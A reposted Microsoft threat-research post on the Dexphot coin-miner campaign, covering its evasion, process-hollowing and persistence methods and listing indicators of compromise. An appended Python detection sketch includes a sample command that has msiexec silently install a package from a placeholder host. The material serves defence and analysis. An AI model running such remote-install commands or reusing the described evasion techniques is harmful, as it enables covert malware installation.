Microsoft - Insights from 1 year of tracking a polymorphic threat


<div><p>A little over a year ago, in October 2018, our polymorphic outbreak monitoring system detected a large surge in reports, indicating that a large-scale campaign was unfolding. We observed as the new threat attempted to deploy files that changed every 20-30 minutes on thousands of devices. We gave the threat the name “Dexphot,” based on certain characteristics of the malware code.</p>
<p>The Dexphot attack used a variety of sophisticated methods to evade security solutions. Layers of obfuscation, encryption, and the use of randomized file names hid the installation process. Dexphot then used <a href="https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/fileless-threats">fileless techniques</a> to run malicious code directly in memory, leaving only a few traces that can be used for forensics. It hijacked legitimate system processes to disguise malicious activity. If not stopped, Dexphot ultimately ran a cryptocurrency miner on the device, with monitoring services and scheduled tasks triggering re-infection when defenders attempt to remove the malware.</p>
<p>In the months that followed, we closely tracked the threat and witnessed the attackers upgrade the malware, target new processes, and work around defensive measures:</p>
<p><img class="aligncenter size-full wp-image-90222" src="https://www.sickgaming.net/blog/wp-content/uploads/2019/11/insights-from-1-year-of-tracking-a-polymorphic-threat.png" alt="Timeline of evolution of Dexphot malware" width="1642" height="745"></p>
<p>While <a href="https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp">Microsoft Defender Advanced Threat Protection</a>’s pre-execution detection engines blocked Dexphot in most cases, <a href="https://www.microsoft.com/security/blog/2019/10/08/in-hot-pursuit-of-elusive-threats-ai-driven-behavior-based-blocking-stops-attacks-in-their-tracks/">behavior-based machine learning models</a> provided protection for cases where the threat slipped through. Given the threat’s persistence mechanisms, polymorphism, and use of fileless techniques, behavior-based detection was a critical component of the comprehensive protection against this malware and other threats that exhibit similar malicious behaviors.</p>
<p>Microsoft Defender ATP data shows the effectiveness of behavioral blocking and containment capabilities in stopping the Dexphot campaign. Over time, Dexphot-related malicious behavior reports dropped to a low hum, as the threat lost steam.</p>
<p><img class="aligncenter size-full wp-image-90215" src="https://www.sickgaming.net/blog/wp-content/uploads/2019/11/insights-from-1-year-of-tracking-a-polymorphic-threat-1.png" alt="Number of machines that encountered Dexphot over time" width="1502" height="752"></p>
<p>Our close monitoring of Dexphot helped us ensure that our customers were protected from the evolving threat. More importantly, one year’s worth of intelligence helped us gain insight not only into the goals and motivations of Dexphot’s authors, but also into those of cybercriminals in general.</p>
<h3>Complex attack chain</h3>
<p>The early stages of a Dexphot infection involve numerous files and processes. During the execution stage, Dexphot writes five key files to disk:</p>
<ol>
<li>An installer with two URLs</li>
<li>An MSI package file downloaded from one of the URLs</li>
<li>A password-protected ZIP archive</li>
<li>A loader DLL, which is extracted from the archive</li>
<li>An encrypted data file that holds three additional executables that are loaded into system processes via <a href="https://www.microsoft.com/security/blog/2017/07/12/detecting-stealthier-cross-process-injection-techniques-with-windows-defender-atp-process-hollowing-and-atom-bombing/">process hollowing</a></li>
</ol>
<p>Except for the installer, the other processes that run during execution are legitimate system processes. This can make detection and remediation more difficult. These legitimate system processes include <em>msiexec.exe</em> (for installing MSI packages), <em>unzip.exe</em> (for extracting files from the password-protected ZIP archive), <em>rundll32.exe</em> (for loading the loader DLL), <em>schtasks.exe</em> (for scheduled tasks), and <em>powershell.exe</em> (for forced updates). In later stages, Dexphot targets a few other system processes for process hollowing: <em>svchost.exe</em>, <em>tracert.exe</em>, and <em>setup.exe</em>.</p>
<p><img class="aligncenter size-full wp-image-90223" src="https://www.sickgaming.net/blog/wp-content/uploads/2019/11/insights-from-1-year-of-tracking-a-polymorphic-threat-2.png" alt="Dexphot attack chain" width="1724" height="1017"></p>
<h3>Multiple layers of security evasion</h3>
<p>Based on Microsoft Defender ATP signals, <a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=SoftwareBundler:Win32/ICLoader&amp;threatId=222548">SoftwareBundler:Win32/ICLoader</a> and its variants are primarily used to drop and run the Dexphot installer. The installer uses two URLs to download malicious payloads. These are the same two URLs that Dexphot uses later to establish persistence, update the malware, and re-infect the device.</p>
<p>The installer downloads an MSI package from one of the two URLs, and then launches <em>msiexec.exe</em> to perform a silent install. This is the first of several instances of Dexphot employing <a href="https://www.microsoft.com/security/blog/2019/09/26/bring-your-own-lolbin-multi-stage-fileless-nodersok-campaign-delivers-rare-node-js-based-malware/">living-off-the-land techniques</a>, the use of legitimate system processes for nefarious purposes.</p>
<p>Dexphot’s package often contains an obfuscated batch script. If the package contains this file, the script is the first thing that <em>msiexec.exe</em> runs when it begins the installation process. This obfuscated script is designed to check for antivirus products. Dexphot halts the infection process immediately if an antivirus product is found running.</p>
<p>When we first began our research, the batch script only checked for antivirus products from Avast and AVG. Later, Windows Defender Antivirus was added to the checklist.</p>
<p><img class="aligncenter size-full wp-image-90220" src="https://www.sickgaming.net/blog/wp-content/uploads/2019/11/insights-from-1-year-of-tracking-a-polymorphic-threat-3.png" alt width="926" height="328"></p>
<p>If the process is not halted, Dexphot decompresses the password-protected ZIP archive from the MSI package. The password to this archive is within the MSI package. Along with the password, the malware’s authors also include a clean version of <em>unzip.exe</em> so that they don’t have to rely on the target system having a ZIP utility. The <em>unzip.exe</em> file in the package is usually given another name, such as <em>z.exe</em> or <em>ex.exe</em>, to avoid scrutiny.</p>
<p>The ZIP archive usually contains three files: the loader DLL, an encrypted data file (usually named <em>bin.dat</em>), and, often, one clean unrelated DLL, which is likely included to mislead detection.</p>
<p>Dexphot usually extracts the decompressed files to the target system’s Favorites folder. The files are given new, random names, which are generated by concatenating words and numbers based on the time of execution (for example, <em>C:\Users\&lt;user&gt;\Favorites\\Res.Center.ponse\&lt;numbers&gt;</em>). The commands to generate the new names are also obfuscated, for example:</p>
<p><img class="aligncenter size-full wp-image-90217" src="https://www.sickgaming.net/blog/wp-content/uploads/2019/11/insights-from-1-year-of-tracking-a-polymorphic-threat-4.png" alt width="878" height="132"></p>
<p><em>Msiexec.exe</em> next calls <em>rundll32.exe</em>, specifying the loader DLL (<em>urlmon.7z</em> in the example above) in order to decrypt the data file. The decryption process involves ADD and XOR operations, using a key hardcoded in the binary.</p>
<p>The decrypted data contains three executables. Unlike the files described earlier, these executables are never written to the filesystem. Instead, they exist only in memory, and Dexphot runs them by loading them into other system processes via process hollowing.</p>
<h3>Stealthy execution through fileless techniques</h3>
<p><a href="https://www.microsoft.com/security/blog/2017/07/12/detecting-stealthier-cross-process-injection-techniques-with-windows-defender-atp-process-hollowing-and-atom-bombing/">Process hollowing</a> is a technique that can hide malware within a legitimate system process. It replaces the contents of the legitimate process with malicious code. Detecting malicious code hidden using this method is not trivial, so process hollowing has become a prevalent technique used by malware today.</p>
<p>This method has the additional benefit of being fileless: the code can be run without actually being saved on the file system. Not only is it harder to detect the malicious code while it’s running, it’s harder to find useful forensics after the process has stopped.</p>
<p>To initiate process hollowing, the loader DLL targets two legitimate system processes, for example svchost.exe or nslookup.exe, and spawns them in a suspended state. The loader DLL replaces the contents of these processes with the first and second decrypted executables. These executables are monitoring services for maintaining Dexphot’s components. The now-malicious processes are released from suspension and run.</p>
<p>Next, the loader DLL targets the <em>setup.exe</em> file in SysWoW64. It removes <em>setup.exe</em>’s contents and replaces them with the third decrypted executable, a cryptocurrency miner. Although Dexphot always uses a cryptocurrency miner of some kind, it’s not always the same miner. It used different programs like XMRig and JCE Miner over the course of our research.</p>
<p><img class="aligncenter size-full wp-image-90221" src="https://www.sickgaming.net/blog/wp-content/uploads/2019/11/insights-from-1-year-of-tracking-a-polymorphic-threat-5.png" alt width="736" height="117"></p>
<h3>Persistence through regularly scheduled malware updates</h3>
<p>The two monitoring services simultaneously check the status of all three malicious processes. Having dual monitoring services provides redundancy in case one of the monitoring processes is halted. If any of the processes are terminated, the monitors immediately identify the situation, terminate all remaining malicious processes, and re-infect the device. This forced update/re-infection process is started by a PowerShell command similar to the one below:</p>
<p><img class="aligncenter size-full wp-image-90218" src="https://www.sickgaming.net/blog/wp-content/uploads/2019/11/insights-from-1-year-of-tracking-a-polymorphic-threat-6.png" alt width="878" height="78"></p>
<p>The monitoring components also detect freshly launched <em>cmd.exe</em> processes and terminate them promptly. As a final fail-safe, Dexphot uses <em>schtasks.exe</em> to create scheduled tasks, with the command below.</p>
<p><img class="aligncenter size-full wp-image-90219" src="https://www.sickgaming.net/blog/wp-content/uploads/2019/11/insights-from-1-year-of-tracking-a-polymorphic-threat-7.png" alt width="878" height="60"></p>
<p>This persistence technique is interesting, because it employs two distinct MITRE ATT&amp;CK techniques: <a href="https://attack.mitre.org/techniques/T1053/">Scheduled Task</a> and <a href="https://attack.mitre.org/techniques/T1218/">Signed Binary Proxy Execution</a>.</p>
<p>The scheduled tasks call <em>msiexec.exe</em> as a proxy to run the malicious code, much like how <em>msiexec.exe</em> was used during installation. Using <em>msiexec.exe</em>, a legitimate system process, can make it harder to trace the source of malicious activity.</p>
<p>Furthermore, the tasks allow Dexphot to conveniently update the payload from the web every time the tasks run. They automatically update all of Dexphot’s components, both upon system reboot and every 90 or 110 minutes while the system is running.</p>
<p>Dexphot also generates the names for the tasks at runtime, which means a simple block list of hardcoded task names will not be effective in preventing them from running. The names are usually in a GUID format, although after we released our first round of Dexphot-blocking protections, the threat authors began to use random strings.</p>
<p>The threat authors have one more evasion technique for these scheduled tasks: some Dexphot variants copy <em>msiexec.exe</em> to an arbitrary location and give it a random name, such as <em>%AppData%\&lt;random&gt;.exe</em>. This makes the system process running malicious code a literal moving target.</p>
<h3>Polymorphism</h3>
<p>Dexphot exhibits multiple layers of polymorphism across the binaries it distributes. For example, the MSI package used in the campaign contains different files, as shown in the table below. The MSI packages generally include a clean version of <em>unzip.exe</em>, a password-protected ZIP file, and a batch file that checks for currently installed antivirus products. However, the batch file is not always present, and the names of the ZIP files and Loader DLLs, as well as the password for extracting the ZIP file, all change from one package to the next.</p>
<p>In addition, the contents of each Loader DLL differ from package to package, as does the encrypted data included in the ZIP file. This leads to the generation of a different ZIP archive and, in turn, a unique MSI package, each time the attacker bundles the files together. Because of these carefully designed layers of polymorphism, a traditional file-based detection approach wouldn’t be effective against Dexphot.</p>
<table border="1" width="600" align="center">
<tbody>
<tr>
<td rowspan="2" width="60"><strong>MSI package ID</strong></td>
<td colspan="3" width="268"><strong>MSI package contents</strong></td>
<td rowspan="2" width="101"><strong>Password for ZIP file</strong></td>
<td colspan="2" width="172"><strong>Contents of encrypted ZIP</strong></td>
</tr>
<tr>
<td width="88"><strong>Unzip.exe name</strong></td>
<td width="95"><strong>ZIP file name</strong></td>
<td width="84"><strong>Batch file name</strong></td>
<td width="123"><strong>Loader DLL file name</strong></td>
<td width="48"><strong>Encrypted data name</strong></td>
</tr>
<tr>
<td width="60">MSI-1</td>
<td width="88">ex.exe</td>
<td width="95">webUI.r0_</td>
<td width="84">f.bat</td>
<td width="101">kjfhwehjkf</td>
<td width="123">IECache.dll</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-2</td>
<td width="88">ex.exe</td>
<td width="95">analog.tv</td>
<td width="84">f.bat</td>
<td width="101">ZvDagW</td>
<td width="123">kernel32.bin</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-3</td>
<td width="88">z.exe</td>
<td width="95">yandex.zip</td>
<td width="84">f.bat</td>
<td width="101">jeremy</td>
<td width="123">SetupUi.dll</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-4</td>
<td width="88">unzip.exe</td>
<td width="95">ERDNT.LOC.zip</td>
<td width="84"></td>
<td width="101">iso100</td>
<td width="123">ERDNT.LOC</td>
<td width="48">data.bin</td>
</tr>
<tr>
<td width="60">MSI-5</td>
<td width="88">pck.exe</td>
<td width="95">mse.zip</td>
<td width="84"></td>
<td width="101">kika</td>
<td width="123">_steam.dll</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-6</td>
<td width="88">z.exe</td>
<td width="95">msi.zip</td>
<td width="84"></td>
<td width="101">arima</td>
<td width="123">ic64.dll</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-7</td>
<td width="88">z.exe</td>
<td width="95">mse.zip</td>
<td width="84">f.bat</td>
<td width="101">kika</td>
<td width="123">_steam.dll</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-8</td>
<td width="88">z.exe</td>
<td width="95">mse.zip</td>
<td width="84"></td>
<td width="101">kika</td>
<td width="123">_steam.dll</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-9</td>
<td width="88">z.exe</td>
<td width="95">yandex.zip</td>
<td width="84">f.bat</td>
<td width="101">jeremy</td>
<td width="123">SetupUi.dll</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-10</td>
<td width="88">hf.exe</td>
<td width="95">update.dat</td>
<td width="84">f.bat</td>
<td width="101">namr</td>
<td width="123">x32Frame.dll</td>
<td width="48">data.bin</td>
</tr>
<tr>
<td width="60">MSI-11</td>
<td width="88">z.exe</td>
<td width="95">yandex.zip</td>
<td width="84">f.bat</td>
<td width="101">jeremy</td>
<td width="123">SetupUi.dll</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-12</td>
<td width="88">unzip.exe</td>
<td width="95">PkgMgr.iso.zip</td>
<td width="84"></td>
<td width="101">pack</td>
<td width="123">PkgMgr.iso</td>
<td width="48">data.bin</td>
</tr>
<tr>
<td width="60">MSI-13</td>
<td width="88">ex.exe</td>
<td width="95">analog.tv</td>
<td width="84">f.bat</td>
<td width="101">kjfhwefkjwehjkf</td>
<td width="123">urlmon.7z</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-14</td>
<td width="88">ex.exe</td>
<td width="95">icon.ico</td>
<td width="84">f.bat</td>
<td width="101">ZDADW</td>
<td width="123">default.ocx</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-15</td>
<td width="88">hf.exe</td>
<td width="95">update.dat</td>
<td width="84"></td>
<td width="101">namr</td>
<td width="123">AvastFileRep.dll</td>
<td width="48">data.bin</td>
</tr>
<tr>
<td width="60">MSI-16</td>
<td width="88">pck.exe</td>
<td width="95">mse.zip</td>
<td width="84">f.bat</td>
<td width="101">kika</td>
<td width="123">_steam.dll</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-17</td>
<td width="88">z.exe</td>
<td width="95">mse.zip</td>
<td width="84">f.bat</td>
<td width="101">joft</td>
<td width="123">win2k.wim</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-18</td>
<td width="88">ex.exe</td>
<td width="95">plugin.cx</td>
<td width="84">f.bat</td>
<td width="101">ZDW</td>
<td width="123">_setup.ini</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-19</td>
<td width="88">hf.exe</td>
<td width="95">update.dat</td>
<td width="84"></td>
<td width="101">namr</td>
<td width="123">AvastFileRep.dll</td>
<td width="48">data.bin</td>
</tr>
<tr>
<td width="60">MSI-20</td>
<td width="88">ex.exe</td>
<td width="95">installers.msu</td>
<td width="84">f.bat</td>
<td width="101">000cehjkf</td>
<td width="123">MSE.Engine.dll</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-21</td>
<td width="88">z.exe</td>
<td width="95">msi.zip</td>
<td width="84">f.bat</td>
<td width="101">arima</td>
<td width="123">ic64.dll</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-22</td>
<td width="88">z.exe</td>
<td width="95">archive00.x</td>
<td width="84">f.bat</td>
<td width="101">00Jmsjeh20</td>
<td width="123">chrome_watcher.dll</td>
<td width="48">bin.dat</td>
</tr>
</tbody>
</table>
<h3>A multitude of payload hosts</h3>
<p>Besides tracking the files and processes that Dexphot uses to execute an attack, we have also been monitoring the domains used to host malicious payloads. The URLs used for hosting all follow a similar pattern. The domain address usually ends in a .info or .net TLD, while the file name for the actual payload consists of random characters, similar to the randomness previously seen being used to generate file names and scheduled tasks. Some examples from our research are shown in the table below.</p>
<table border="1" width="595" align="center">
<tbody>
<tr>
<td width="274"><strong>Scheduled task name</strong></td>
<td width="321"><strong>Download URL</strong></td>
</tr>
<tr>
<td width="274">hboavboja</td>
<td width="321">https://supe********709.info/xoslqzu.pdi</td>
</tr>
<tr>
<td width="274">{C0B15B19-AB02-0A10-259B-1789B8BD78D6}</td>
<td width="321">https://fa*****r.com/jz5jmdouv4js.uoe</td>
</tr>
<tr>
<td width="274">ytiazuceqeif</td>
<td width="321">https://supe********709.info/spkfuvjwadou.bbo</td>
</tr>
<tr>
<td width="274">beoxlwayou</td>
<td width="321">https://rb*****.info/xgvylniu.feo</td>
</tr>
<tr>
<td width="274">{F1B4C720-5A8B-8E97-8949-696A113E8BA5}</td>
<td width="321">https://emp*******winc.com/f85kr64p1s5k.naj</td>
</tr>
<tr>
<td width="274">gxcxhbvlkie</td>
<td width="321">https://gu*****me.net/ssitocdfsiu.pef</td>
</tr>
<tr>
<td width="274">{BE7FFC87-6635-429F-9F2D-CD3FD0E6DA51}</td>
<td width="321">https://sy*****.info/pasuuy/xqeilinooyesejou.oew</td>
</tr>
<tr>
<td width="274">{0575F553-1277-FB0F-AF67-EB649EE04B39}</td>
<td width="321">https://sumb*******on.info/gbzycb.kiz</td>
</tr>
<tr>
<td width="274">gposiiobhkwz</td>
<td width="321">https://gu*****me.net/uyuvmueie.hui</td>
</tr>
<tr>
<td width="274">{EAABDEAC-2258-1340-6375-5D5C1B7CEA7F}</td>
<td width="321">https://refr*******r711.info/3WIfUntot.1Mb</td>
</tr>
<tr>
<td width="274">zsayuuec</td>
<td width="321">https://gu*****me.net/dexaeuioiexpyva.dil</td>
</tr>
<tr>
<td width="274">njibqhcq</td>
<td width="321">https://supe********709.info/aodoweuvmnamugu.fux</td>
</tr>
<tr>
<td width="274">{22D36F35-F5C2-29D3-1CF1-C51AC19564A4}</td>
<td width="321">https://pr*****.info/ppaorpbafeualuwfx/hix.ayk</td>
</tr>
<tr>
<td width="274">qeubpmnu</td>
<td width="321">https://gu*****me.net/ddssaizauuaxvt.cup</td>
</tr>
<tr>
<td width="274">adeuuelv</td>
<td width="321">https://supe********709.info/tpneevqlqziee.okn</td>
</tr>
<tr>
<td width="274">{0B44027E-7514-5EC6-CE79-26EB87434AEF}</td>
<td width="321">https://sy*****.info/huauroxaxhlvyyhp/xho.eqx</td>
</tr>
<tr>
<td width="274">{5A29AFD9-63FD-9F5E-F249-5EC1F2238023}</td>
<td width="321">https://refr*******r711rb.info/s28ZXoDH4.78y</td>
</tr>
<tr>
<td width="274">{C5C1D86D-44BB-8EAA-5CDC-26B37F92E411}</td>
<td width="321">https://fa*****r.com/rbvelfbflyvf.rws</td>
</tr>
</tbody>
</table>
<p>Many of the URLs listed were in use for an extended period. However, the MSI packages hosted at each URL are frequently changed or updated. In addition, every few days more domains are generated to host more payloads. After a few months of monitoring, we were able to identify around 200 unique Dexphot domains.</p>
<h3>Conclusion: Dynamic, comprehensive protection against increasingly complex everyday threats</h3>
<p>Dexphot is not the type of attack that generates mainstream media attention; it’s one of the countless malware campaigns that are active at any given time. Its goal is a very common one in cybercriminal circles — to install a coin miner that silently steals computer resources and generates revenue for the attackers — yet Dexphot exemplifies the level of complexity and rate of evolution of even everyday threats, intent on evading protections and motivated to fly under the radar for the prospect of profit.</p>
<p>To combat threats, several <a href="https://www.microsoft.com/security/blog/2019/06/24/inside-out-get-to-know-the-advanced-technologies-at-the-core-of-microsoft-defender-atp-next-generation-protection/">next-generation protection engines</a> in <a href="https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp">Microsoft Defender Advanced Threat Protection</a>’s antivirus component detect and stop malicious techniques at multiple points along the attack chain. For Dexphot, machine learning-based detections in the cloud recognize and block the DLLs loaded by <em>rundll32.exe</em>, stopping the attack chain in its early stages. Memory scans detect and terminate the loading of malicious code hidden by process hollowing — including the monitoring processes that attempt to update the malware code and re-infect the machine via PowerShell commands.</p>
<p><a href="https://www.microsoft.com/security/blog/2019/10/08/in-hot-pursuit-of-elusive-threats-ai-driven-behavior-based-blocking-stops-attacks-in-their-tracks/">Behavioral blocking and containment capabilities</a> are especially effective in defeating Dexphot’s fileless techniques, detection evasion, and persistence mechanisms, including the periodic and boot-time attempts to update the malware via scheduled tasks. As mentioned, given the complexity of the attack chain and of Dexphot’s persistence methods, we released a <a href="https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/configure-remediation-windows-defender-antivirus">remediation</a> solution that prevents re-infection by removing artifacts.</p>
<p><img class="aligncenter size-full wp-image-90224" src="https://www.sickgaming.net/blog/wp-content/uploads/2019/11/insights-from-1-year-of-tracking-a-polymorphic-threat-8.png" alt="Microsoft Defender ATP solutions for Dexphot attack" width="1724" height="1017"></p>
<p>The detection, blocking, and remediation of Dexphot on endpoints are exposed in Microsoft Defender Security Center, where <a href="https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp">Microsoft Defender ATP</a>’s rich capabilities like endpoint detection and response, automated investigation and remediation, and others enable security operations teams to investigate and remediate attacks in enterprise environments. With these capabilities, Microsoft Defender ATP provides comprehensive protection against Dexphot and the countless other complex and evolving threats that we face every day.</p>
<h3>Sample indicators of compromise (IoCs)</h3>
<p>Installer (SHA-256):<br />72acaf9ff8a43c68416884a3fff3b23e749b4bb8fb39e16f9976643360ed391f</p>
<p>MSI files (SHA-256):<br />22beffb61cbdc2e0c3eefaf068b498b63a193b239500dab25d03790c467379e3<br />65eac7f9b67ff69cefed288f563b4d77917c94c410c6c6c4e4390db66305ca2a<br />ba9467e0d63ba65bf10650a3c8d36cd292b3f846983032a44a835e5966bc7e88</p>
<p>Loader DLLs (SHA-256):<br />537d7fe3b426827e40bbdd1d127ddb59effe1e9b3c160804df8922f92e0b366e<br />504cc403e0b83233f8d20c0c86b0611facc040b868964b4afbda3214a2c8e1c5<br />aa5c56fe01af091f07c56ac7cbd240948ea6482b6146e0d3848d450977dff152</p>
<p><strong><em>Hazel Kim</em></strong></p>
<p><em>Microsoft Defender ATP Research Team</em></p>
</div>


https://www.sickgaming.net/blog/2019/11/...ic-threat/
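
Added example (not part of the Microsoft article and not Microsoft Defender ATP logic): the attack-chain, process-hollowing and scheduled-task passages above all describe behaviour that stays constant while file names, task names and hashes change, so this sketch matches on that behaviour in process-creation events. It assumes Sysmon Event ID 1 style fields (Image, ParentImage, CommandLine, OriginalFileName, ProcessId); the rule names, sample events, the host payload.example and the export name are constructed for illustration.

```python
import ntpath
import re

# Processes the article names as process-hollowing targets.
HOLLOW_TARGETS = {"svchost.exe", "nslookup.exe", "tracert.exe", "setup.exe"}
# Extensions treated as normal for a rundll32 module (an assumption of this sketch).
NORMAL_MODULE_EXT = {".dll", ".cpl"}
URL_RE = re.compile(r"https?://", re.I)
RUNDLL_ARG_RE = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^",]+)', re.I)


def base(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path or "").lower()


def evaluate(ev):
    """Return the names of the rules one process-creation event matches."""
    hits = []
    image, parent = base(ev.get("Image")), base(ev.get("ParentImage"))
    cmd = ev.get("CommandLine") or ""
    # OriginalFileName comes from the PE version resource, so it still says
    # msiexec.exe after the binary is copied to a random name.
    original = (ev.get("OriginalFileName") or "").lower()

    if "msiexec.exe" in (image, original):
        if URL_RE.search(cmd):          # package fetched from the web
            hits.append("msiexec_remote_package")
        if image != "msiexec.exe":      # renamed copy used as the proxy
            hits.append("renamed_msiexec")

    if image == "rundll32.exe":
        m = RUNDLL_ARG_RE.search(cmd)
        module = m.group(1).strip() if m else ""
        ext = ntpath.splitext(module)[1].lower()
        if "\\favorites\\" in module.lower():
            hits.append("rundll32_module_in_favorites")
        if ext and ext not in NORMAL_MODULE_EXT:
            hits.append("rundll32_non_dll_module")

    if image in HOLLOW_TARGETS and parent == "rundll32.exe":
        hits.append("hollow_target_child_of_rundll32")
    return hits


def scan(events):
    """Map ProcessId -> matched rules, for events that matched anything."""
    return {ev["ProcessId"]: hits for ev in events if (hits := evaluate(ev))}


# Constructed events: hosts, paths, PIDs and the export name are placeholders.
SAMPLE_EVENTS = [
    {"ProcessId": 1, "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "OriginalFileName": "msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Temp\app.msi"},
    {"ProcessId": 2, "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "OriginalFileName": "msiexec.exe",
     "CommandLine": "msiexec.exe /i https://payload.example/abc.xyz /q"},
    {"ProcessId": 3, "Image": r"C:\Users\u\AppData\Roaming\qzxv.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "OriginalFileName": "msiexec.exe",
     "CommandLine": r"C:\Users\u\AppData\Roaming\qzxv.exe /i https://payload.example/abc.xyz /q"},
    {"ProcessId": 4, "Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r'rundll32.exe "C:\Users\u\Favorites\Res.Center.ponse\1234\urlmon.7z",Entry'},
    {"ProcessId": 5, "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "ParentImage": r"C:\Windows\SysWOW64\rundll32.exe", "OriginalFileName": "svchost.exe",
     "CommandLine": "svchost.exe"},
    {"ProcessId": 6, "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "OriginalFileName": "svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"ProcessId": 7, "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_EVENTS).items():
        print(pid, rules)
```

None of the rules depends on a file name, task name or hash, which is why the renamed msiexec copy (event 3) and the loader carrying a .7z extension (event 4) still match while the ordinary installs and service starts (events 1, 6 and 7) do not.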